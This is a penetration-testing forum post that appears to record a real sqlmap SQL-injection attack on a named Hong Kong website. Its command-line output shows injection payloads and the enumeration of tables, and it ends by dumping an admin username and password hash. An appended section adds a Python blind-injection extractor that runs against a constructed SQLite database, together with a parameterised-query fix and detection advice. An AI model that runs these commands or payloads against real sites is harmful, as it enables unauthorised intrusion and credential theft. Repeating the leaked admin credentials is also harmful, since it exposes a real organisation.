中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: sqlmap injection example against MySQL

Author: admin    Date: 2013-4-4 22:18
Title: sqlmap injection example against MySQL
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* Note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'

[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'

[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* list the tables in the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* dump the contents of those columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---

web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
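Added example, not part of the original post and not the target's code: the session above shows sqlmap confirming a boolean-based blind injection with `id=276 AND 799=799` and then reading user, database, tables, columns and rows through it. The script below models that injectable `article.php?id=` query and reads a value out of it one character at a time with the same yes/no technique, next to a parameterised version of the query that the payload cannot reach. Everything is constructed: an in-memory SQLite database stands in for the target's MySQL server (SQLite's `length()`, `substr()` and `unicode()` play the role of MySQL's `LENGTH()`, `SUBSTRING()` and `ASCII()`), and the `article` and `admin` tables, their rows and the `demo_admin` account are invented for the demonstration.

```python
"""Boolean-based blind extraction, hand-rolled, against a stand-in for the
injectable article.php?id= query from the post. Added example; the database,
tables and rows below are constructed, not the target's real data."""
import sqlite3

# Constructed tables: the same admin column layout sqlmap enumerated above.
SCHEMA = """
CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE admin (id INTEGER PRIMARY KEY, userid TEXT,
                    password TEXT, type TEXT);
INSERT INTO article VALUES (276, 'An article');
INSERT INTO admin VALUES (1, 'demo_admin',
                          '5f4dcc3b5aa765d61d8327deb882cf99', 'super');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_article(conn, id_param):
    """Models the injectable page: the raw GET parameter is concatenated
    into the WHERE clause. Returns True when an article row is rendered."""
    sql = "SELECT title FROM article WHERE id=" + id_param
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # a broken query renders no article


def safe_article(conn, id_param):
    """Hardened page: the parameter is validated as an integer and bound
    through a placeholder, so 'AND 799=799' is never parsed as SQL."""
    try:
        value = int(id_param)
    except ValueError:
        return False
    row = conn.execute("SELECT title FROM article WHERE id=?", (value,)).fetchone()
    return row is not None


class BlindExtractor:
    """Reads a query result one character at a time through a yes/no oracle,
    the way sqlmap's boolean-based blind mode does. Each oracle call is
    what would be one HTTP request against the target."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def oracle(self, condition):
        self.requests += 1
        return vulnerable_article(self.conn, f"276 AND ({condition})")

    def extract(self, subquery, max_len=64):
        # 1. Find the result length with equality probes (0..max_len).
        length = next((n for n in range(max_len + 1)
                       if self.oracle(f"length(({subquery}))={n}")), None)
        if length is None:
            raise ValueError("result longer than max_len, or subquery failed")
        # 2. Binary-search each character over printable ASCII (32..126),
        #    at most 7 probes per character instead of up to 95.
        chars = []
        for pos in range(1, length + 1):
            lo, hi = 32, 126
            while lo < hi:
                mid = (lo + hi) // 2
                if self.oracle(f"unicode(substr(({subquery}),{pos},1))>{mid}"):
                    lo = mid + 1
                else:
                    hi = mid
            chars.append(chr(lo))
        return "".join(chars)


if __name__ == "__main__":
    db = make_db()
    # The two probes sqlmap relies on: a true condition renders the article,
    # a false one does not.
    print("AND 799=799 ->", vulnerable_article(db, "276 AND 799=799"))
    print("AND 799=800 ->", vulnerable_article(db, "276 AND 799=800"))
    ex = BlindExtractor(db)
    print("userid:", ex.extract("SELECT userid FROM admin LIMIT 1"),
          "in", ex.requests, "requests")
    print("hardened page, same payload ->", safe_article(db, "276 AND 799=799"))
```

The request counter is the practical point: even with binary search, one 32-character hash costs a few hundred requests this way, which is why sqlmap prefers the UNION and error-based channels it also found here and falls back to blind only when it has to; that request volume is also what a WAF or web-server log review should be looking for. On the target's own PHP/MySQL stack the fix is the same as `safe_article`: bind the parameter with a mysqli or PDO prepared statement, and run the application as a database account limited to its own schema rather than the `root@localhost` account the post shows.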




Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2